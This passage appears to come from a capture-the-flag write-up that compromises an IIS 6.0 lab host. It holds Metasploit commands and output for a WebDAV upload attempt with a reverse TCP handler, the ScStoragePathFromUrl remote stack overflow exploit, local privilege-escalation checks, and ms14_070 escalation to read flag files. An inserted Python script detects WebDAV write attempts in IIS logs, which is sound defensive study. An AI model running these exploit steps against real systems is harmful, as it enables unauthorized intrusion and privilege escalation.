OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
Search Metasploit for Microsoft FrontPage modules:
auxiliary/scanner/http/frontpage_login
Result:
[*] 10.10.10.14:80 - http://10.10.10.14/ may not support FrontPage Server Extensions
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What is WebDAV?
WebDAV is an extension of the HTTP/1.1 protocol that lets clients perform remote web content authoring operations. It adds new HTTP methods and headers and supports authoring of arbitrary content types: not only HTML and XML, but also text, graphics, spreadsheets and other formats.
Related reading: WebDAV security configuration and vulnerability exploitation
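Because the authoring methods WebDAV adds (PUT, MOVE, COPY, DELETE, MKCOL, PROPPATCH, LOCK, UNLOCK) are exactly the ones a defender should watch on an IIS host, here is an added example (not part of the original write-up) that parses IIS W3C extended log lines and flags every WebDAV write attempt, whether the server accepted it or rejected it as in the 500 error shown later in this post. The log lines are constructed for this example; the field layout is the standard IIS "#Fields:" header, and the hosts 10.10.10.14 and 10.10.14.13 are taken from the write-up.

```python
"""Flag WebDAV authoring requests in IIS W3C extended log lines.

Added example, not the write-up's own tooling. The sample log below is
constructed; the column layout follows the IIS W3C "#Fields:" header.
"""
from collections import defaultdict

# HTTP methods that WebDAV (RFC 4918) adds for remote authoring. Any of
# these reaching a web server is a write attempt worth reviewing.
WEBDAV_WRITE_METHODS = {
    "PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK",
}

# Extensions IIS hands to a script engine; a write landing on one of these
# is the highest-severity case.
SCRIPT_EXTENSIONS = (".asp", ".aspx", ".ashx", ".asmx", ".asa", ".cer", ".cdx")

# Constructed sample log (IIS W3C format) for this example only.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-01-01 10:00:00 10.10.10.14 GET /default.htm - 80 - 10.10.14.13 Mozilla/5.0 200
2024-01-01 10:00:01 10.10.10.14 OPTIONS / - 80 - 10.10.14.13 Mozilla/5.0 200
2024-01-01 10:00:02 10.10.10.14 PROPFIND /metasploit250598085.asp - 80 - 10.10.14.13 Mozilla/5.0 404
2024-01-01 10:00:03 10.10.10.14 PUT /metasploit250598085.txt - 80 - 10.10.14.13 Mozilla/5.0 500
2024-01-01 10:00:04 10.10.10.14 PUT /upload/notes.txt - 80 - 10.10.14.13 Mozilla/5.0 201
2024-01-01 10:00:05 10.10.10.14 MOVE /upload/notes.txt - 80 - 10.10.14.13 Mozilla/5.0 201
2024-01-01 10:00:06 10.10.10.14 GET /upload/notes.asp - 80 - 10.10.14.13 Mozilla/5.0 200
"""


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields: header."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # header can change mid-file; track the latest
            continue
        if line.startswith("#"):
            continue                    # other directives (#Software, #Date, ...)
        if fields is None:
            raise ValueError("data line before #Fields: header")
        values = line.split()
        if len(values) != len(fields):
            continue                    # skip malformed lines instead of mis-assigning columns
        yield dict(zip(fields, values))


def classify(entry):
    """Return a finding for a WebDAV write request, or None for anything else."""
    method = entry["cs-method"].upper()
    if method not in WEBDAV_WRITE_METHODS:
        return None
    path = entry["cs-uri-stem"]
    status = int(entry["sc-status"])
    # IIS does not log the Destination header by default, so the target name of a
    # MOVE/COPY is unknown from the log alone; treat those as high severity outright,
    # along with any write whose own path already has a script extension.
    if method in ("MOVE", "COPY") or path.lower().endswith(SCRIPT_EXTENSIONS):
        severity = "high"
    else:
        severity = "medium"
    outcome = "succeeded" if 200 <= status < 300 else "rejected"
    return {
        "client": entry["c-ip"], "method": method, "path": path,
        "status": status, "severity": severity, "outcome": outcome,
    }


def find_webdav_writes(text):
    """All WebDAV write findings in a W3C log, in file order."""
    return [f for f in (classify(e) for e in parse_w3c(text)) if f]


def summarize_by_client(findings):
    """Count accepted versus rejected write attempts per client address."""
    counts = defaultdict(lambda: {"succeeded": 0, "rejected": 0})
    for f in findings:
        counts[f["client"]][f["outcome"]] += 1
    return dict(counts)


if __name__ == "__main__":
    hits = find_webdav_writes(SAMPLE_LOG)
    for h in hits:
        print(f'{h["severity"]:6} {h["outcome"]:9} {h["client"]} {h["method"]} {h["path"]} -> {h["status"]}')
    print(summarize_by_client(hits))
```

Rejected attempts are kept deliberately: a PUT answered with 500, as in the upload attempt shown below, still tells you who is probing for writable WebDAV paths. On a production host the remediation is to disable the WebDAV authoring methods on any site that does not need them and to require authentication where they are needed.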
Try 3: WebDAV PUT upload
exploit/windows/iis/iis_webdav_upload_asp
[*] Started reverse TCP handler on 10.10.14.13:4444
[*] Checking /metasploit250598085.asp
[*] Uploading 611136 bytes to /metasploit250598085.txt...
[-] Upload failed on /metasploit250598085.txt [500 Internal Server Error]
[*] Exploit completed, but no session was created.
Getting a shell
Remote stack overflow
At the time the Python exploit failed to run, so I assumed the vulnerability didn't exist ==
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set RHOST 10.10.10.14
run
getuid
pwd
sysinfo
Privilege escalation
search suggester
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 28 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
After trying them, privilege escalation succeeded:
use exploit/windows/local/ms14_070_tcpip_ioctl
set SESSION 3
set LHOST tun0
run
ps    (view processes)
cd C:\Documents and Settings\Harry\Desktop
cat user.txt
cd C:\Documents and Settings\Administrator\Desktop
cat root.txt